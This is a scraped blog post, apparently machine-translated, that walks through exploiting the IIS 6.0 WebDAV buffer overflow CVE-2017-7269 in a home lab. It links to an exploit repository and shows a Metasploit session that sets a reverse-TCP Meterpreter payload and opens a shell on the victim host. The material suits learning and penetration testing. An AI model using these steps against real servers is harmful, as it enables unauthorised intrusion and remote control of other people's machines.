IIS6.0 (CVE-2017-7269) buffer overflows

Others 2019-09-09 12:25:34 views: null

Vulnerability Description
open WebDAV service buffer overrun vulnerability exists IIS 6.0 can lead to remote code execution, so for the current IIS 6.0 users, available workaround is to turn off WebDAV service.

Vulnerability ID
CVE-2017-7269

Vulnerability level
of high-risk

The impact of products
Microsoft Windows Server 2003 R2 IIS6.0 open WebDAV services

Vulnerability environment to build
my environment is windows 2003 R2 Enterprise Edition, enter the service management After installing IIS 6.0, the manager, there is a windows expand, expand, there is a webdav option to prohibit state this option by default, right-select permission it.

Subsequently windows + R-> services.msc-> open webcClient service, complete the configuration


Vulnerability testing
attack aircraft: kali IP: 192.168.48.131
victim machine: windows2003 IP: 192.168.48.146
download exploit: https: //github.com/Al1ex/CVE-2017-7269
the exp into
/ usr / share / metasploitframework / modules / exploits / windows / iis directory

msf > search cve-2017-7269

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/iis/cve-2017-7269 2017-03-31 good CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf > use exploit/windows/iis/cve-2017-7269
msf exploit(windows/iis/cve-2017-7269) > show options

Module options (exploit/windows/iis/cve-2017-7269):

Name Current Setting Required Description
---- --------------- -------- -----------
HttpHost localhost yes http host for target
PhysicalPathLength 19 yes length of physical path for target(include backslash)
RHOST yes The target address
RPORT 80 yes The target port (TCP)


Exploit target:

Id Name
-- ----
0 Microsoft Windows Server 2003 R2


msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146 //设置对方ip
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146 //设置对方网站
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp //设置返回载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131 //设置本机ip
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit //溢出

[*] Started reverse TCP handler on 192.168.48.131:4444
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800

meterpreter >

 

 

 

 

 

Guess you like

Origin www.cnblogs.com/kuaile1314/p/11489707.html
Recommended
Ranking
A quick primer on numpy basics
Two sister tease python project
Java | Multiple keywords in the replacement content are returned to the front end in red style
C ++: references
The string leetcood 1018 is a binary prefix divisible by 5
Flutter 布局组件
Java combat spingboot-redis
PMP pre-exam sprint and wrong questions sorting
ActiveMq C# Message Features: Delayed and Timed Message Delivery
DSP28377S_ copy a program from the RAM to FLASH portion DETAILS
Daily
More
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)

Code World

© 2018 codetd.com